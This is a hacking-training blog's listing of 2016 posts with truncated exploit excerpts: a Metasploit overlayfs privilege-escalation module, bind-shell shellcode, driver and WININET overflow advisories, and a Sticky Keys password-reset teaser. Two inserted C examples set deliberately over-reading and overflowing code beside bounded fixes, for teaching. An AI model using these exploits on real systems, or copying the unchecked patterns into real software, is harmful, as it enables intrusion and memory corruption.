Extreme Hacking

We work in Dark, to serve the Light


Android Proxy Auto Config (PAC) Crash Vulnerability

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Yakov Shafranovich
Summary

Android devices can be crashed, forcing a halt and then a soft reboot,
by downloading a large proxy auto-config (PAC) file when adjusting the
Android networking settings. This can also be exploited by an MITM
attacker who can intercept and replace the PAC file. However, the […]

By |November 13th, 2016|Exploits|

Microsoft Internet Explorer WININET.dll


Credits: SkyLined
Synopsis
 
A specially crafted HTTP response can cause the CHttpHeaderParser::ParseStatusLine method in WININET to read data beyond the end of a buffer. The size of the read can be controlled through the HTTP response. An attacker that is able to get any application that uses WININET […]
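The bug class in that synopsis is easy to reproduce in miniature: a status-line parser that scans for the line terminator without ever consulting the buffer length will keep reading until it finds an LF somewhere in adjacent memory, so the sender controls how far it over-reads simply by omitting the CRLF. The following is an added illustration written for this page, not the WININET code and not a reconstruction of it; the parser, the `status_line` struct and the 64-byte "arena" that stands in for whatever follows the real buffer are all hypothetical, and the response bytes are constructed here.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Illustrative status-line parser (hypothetical, NOT WININET's). */
struct status_line {
    int    code;        /* e.g. 200 */
    size_t reason_len;  /* bytes of reason phrase the parser consumed */
};

/* Vulnerable pattern: assumes the line is terminated by "\r\n" and scans for it
 * without using `len`. When the response stops early, the scan runs off the end
 * of the buffer and stops only at the next LF in neighbouring memory, so the
 * sender decides how much out-of-bounds data gets read. */
static int parse_status_line_unchecked(const char *buf, size_t len, struct status_line *out)
{
    (void)len;                                   /* the bug: length never consulted */
    if (strncmp(buf, "HTTP/", 5) != 0) return -1;
    const char *p = buf + 5;
    while (*p != ' ') p++;                       /* skip version */
    p++;
    int code = 0;
    while (*p >= '0' && *p <= '9') code = code * 10 + (*p++ - '0');
    if (*p != ' ') return -1;
    p++;
    const char *reason = p;
    while (*p != '\n') p++;                      /* unbounded scan */
    size_t rlen = (size_t)(p - reason);
    if (rlen > 0 && reason[rlen - 1] == '\r') rlen--;
    out->code = code;
    out->reason_len = rlen;
    return 0;
}

/* Hardened: every dereference is checked against `end`; an incomplete line is an
 * error rather than an invitation to keep reading. */
static int parse_status_line_bounded(const char *buf, size_t len, struct status_line *out)
{
    const char *end = buf + len, *p = buf;
    if (len < 5 || memcmp(buf, "HTTP/", 5) != 0) return -1;
    p += 5;
    while (p < end && *p != ' ') p++;
    if (p >= end) return -1;
    p++;
    int code = 0, digits = 0;
    while (p < end && *p >= '0' && *p <= '9' && digits < 3) { code = code * 10 + (*p - '0'); p++; digits++; }
    if (digits != 3 || p >= end || *p != ' ') return -1;
    p++;
    const char *reason = p;
    while (p < end && *p != '\n') p++;
    if (p >= end) return -1;                     /* no terminator inside the buffer */
    size_t rlen = (size_t)(p - reason);
    if (rlen > 0 && reason[rlen - 1] == '\r') rlen--;
    out->code = code;
    out->reason_len = rlen;
    return 0;
}

/* Constructed input: a 15-byte status line cut off before its CRLF, placed at the
 * start of a larger arena filled with 'A' and a single LF 45 bytes past the end of
 * the real response. */
#define ARENA_SIZE 64
static const char TRUNCATED_RESPONSE[] = "HTTP/1.1 200 OK";
static char g_arena[ARENA_SIZE];

static size_t load_arena(void)
{
    size_t len = strlen(TRUNCATED_RESPONSE);
    memset(g_arena, 'A', sizeof g_arena);
    memcpy(g_arena, TRUNCATED_RESPONSE, len);
    g_arena[60] = '\n';
    return len;
}

/* Reason-phrase length the unchecked parser reports: 2 real bytes + 45 over-read. */
size_t demo_unchecked_overread(void)
{
    size_t len = load_arena();
    struct status_line sl = {0, 0};
    return parse_status_line_unchecked(g_arena, len, &sl) == 0 ? sl.reason_len : 0;
}

/* The bounded parser refuses the same bytes (-1) instead of reading past `len`. */
int demo_bounded_on_truncated(void)
{
    size_t len = load_arena();
    struct status_line sl = {0, 0};
    return parse_status_line_bounded(g_arena, len, &sl);
}

/* A well-formed line still parses: returns the status code, reason length via out. */
int demo_bounded_complete(size_t *reason_len)
{
    static const char ok[] = "HTTP/1.1 404 Not Found\r\n";
    struct status_line sl = {0, 0};
    if (parse_status_line_bounded(ok, sizeof ok - 1, &sl) != 0) return -1;
    *reason_len = sl.reason_len;
    return sl.code;
}

int main(void)
{
    size_t rl = 0;
    printf("unchecked reason_len on truncated line: %zu\n", demo_unchecked_overread());
    printf("bounded result on truncated line: %d\n", demo_bounded_on_truncated());
    printf("bounded complete line: code %d, reason_len %zu\n", demo_bounded_complete(&rl), rl);
    return 0;
}
```

The practitioner's takeaway is the `p >= end` check at the terminator: a parser that cannot find the end of a line inside the buffer it was handed must fail, not guess. Compiling with `-fsanitize=address` and removing the arena padding turns the unchecked variant's over-read into an immediate crash, which is the quickest way to confirm a suspected bug of this shape.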

By |November 13th, 2016|Exploits|

What Does The IP Address 0.0.0.0 Really Mean? What Are Its Different Uses?


You might have heard about the IP address 0.0.0.0 but never thought much about it. Some of you may know that it is a 'no particular address' placeholder. But what else? What does it really mean in different situations? Well, here I'll try to answer these […]

By |November 7th, 2016|Papers|

Hack Sticky Key Feature And Reset Windows Password Using CMD


Protecting your Windows machine with a password is a must. It is a valuable layer of security that prevents unauthorized people from using your computer. But there are times when your own security layer locks you out of your Windows OS. Probably because you aren't worthy of […]

By |November 7th, 2016|Papers|

Linux Kernel (Ubuntu / Fedora / Redhat) – ‘Overlayfs’ Privilege Escalation Exploit – Metasploit Code


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking
 
  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
        'Name'           => 'Overlayfs Privilege Escalation',
        'Description'    => %q{
          This module attempts to exploit two different CVEs related to overlayfs.
          CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55
                                            3.16.0-25 […]

By |November 3rd, 2016|Exploits|

MySQL / MariaDB / PerconaDB – ‘root’ Privilege Escalation Vulnerability – Metasploit Code


Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

By |November 3rd, 2016|Exploits|

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv


The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]
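The pattern the excerpt is heading towards is a character count taken from the caller-supplied `Length` of the image name and used to drive a copy into a fixed-size stack array. Below is an added user-mode illustration of that pattern beside its bounded form; it is not the NvStreamKms.sys code and does not reproduce the driver's logic. The `unicode_string` struct mirrors the layout of the kernel's UNICODE_STRING (Length in bytes, 16-bit characters), `NAME_SLOTS` is a hypothetical stack-array size chosen for the demo, and the image paths are constructed here.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t WCHAR;             /* kernel WCHAR is 16 bits, unlike host wchar_t */

/* User-mode stand-in for UNICODE_STRING: Length is in BYTES, not characters. */
struct unicode_string {
    uint16_t Length;
    uint16_t MaximumLength;
    WCHAR   *Buffer;
};

#define NAME_SLOTS 32               /* hypothetical fixed-size array in the callback frame */

/* Vulnerable pattern: num_chars comes straight from Length, and the copy into the
 * fixed stack array has no upper bound. A process whose image path exceeds
 * NAME_SLOTS characters overwrites the callback's stack frame. Called here only
 * with a short name so the demo itself does not corrupt memory. */
static size_t copy_image_name_unchecked(const struct unicode_string *name, WCHAR local[NAME_SLOTS])
{
    size_t num_chars = name->Length / sizeof(WCHAR);
    for (size_t i = 0; i < num_chars; i++)
        local[i] = name->Buffer[i];  /* past local[] once i >= NAME_SLOTS */
    return num_chars;
}

/* Hardened: clamp to the destination, keep room for a terminator, and tell the
 * caller that truncation happened rather than silently dropping the tail. */
static size_t copy_image_name_bounded(const struct unicode_string *name, WCHAR local[NAME_SLOTS], int *truncated)
{
    size_t num_chars = name->Length / sizeof(WCHAR);
    size_t n = num_chars;
    *truncated = 0;
    if (n > NAME_SLOTS - 1) {
        n = NAME_SLOTS - 1;
        *truncated = 1;
    }
    memcpy(local, name->Buffer, n * sizeof(WCHAR));
    local[n] = 0;
    return n;
}

/* Builds a unicode_string from an ASCII path (constructed test input). */
static size_t widen(const char *ascii, WCHAR *dst, size_t cap, struct unicode_string *out)
{
    size_t n = strlen(ascii);
    if (n > cap) n = cap;
    for (size_t i = 0; i < n; i++) dst[i] = (WCHAR)(unsigned char)ascii[i];
    out->Length        = (uint16_t)(n * sizeof(WCHAR));
    out->MaximumLength = (uint16_t)(cap * sizeof(WCHAR));
    out->Buffer        = dst;
    return n;
}

/* A 199-character image path: the bounded copy stops at NAME_SLOTS-1 and reports it. */
size_t demo_bounded_long_path(int *truncated)
{
    static WCHAR storage[256];
    static char path[200];
    struct unicode_string name;
    WCHAR local[NAME_SLOTS];
    memset(path, 'A', sizeof path - 1);
    path[sizeof path - 1] = '\0';
    widen(path, storage, 256, &name);
    return copy_image_name_bounded(&name, local, truncated);
}

/* A 22-character path fits in both variants, so both return the full length. */
size_t demo_short_path(size_t *unchecked_len)
{
    static WCHAR storage[64];
    struct unicode_string name;
    WCHAR local[NAME_SLOTS];
    int truncated = 0;
    widen("C:\\Windows\\notepad.exe", storage, 64, &name);
    *unchecked_len = copy_image_name_unchecked(&name, local);
    return copy_image_name_bounded(&name, local, &truncated);
}

int main(void)
{
    int truncated = 0;
    size_t unchecked = 0;
    printf("long path: bounded copied %zu chars, truncated=%d\n",
           demo_bounded_long_path(&truncated), truncated);
    printf("short path: bounded %zu, unchecked %zu\n",
           demo_short_path(&unchecked), unchecked);
    return 0;
}
```

Two details matter when auditing a notify routine of this kind: `Length` is a byte count, so dividing by `sizeof(WCHAR)` is correct but any code that treats it as a character count doubles the copy; and because the image path is attacker-chosen (any user can launch a process from a deep directory), the bound has to come from the destination, never from the source.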

By |November 3rd, 2016|Exploits|

Linux/x86-64 – Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode


Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

By |October 31st, 2016|Exploits|

Linux/x86 – NetCat Bind Shell with Port using C Programming


Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
 
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

By |October 31st, 2016|Exploits|

Windows/x86 – Password Protected TCP Bind Shell


Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

By |October 29th, 2016|Exploits|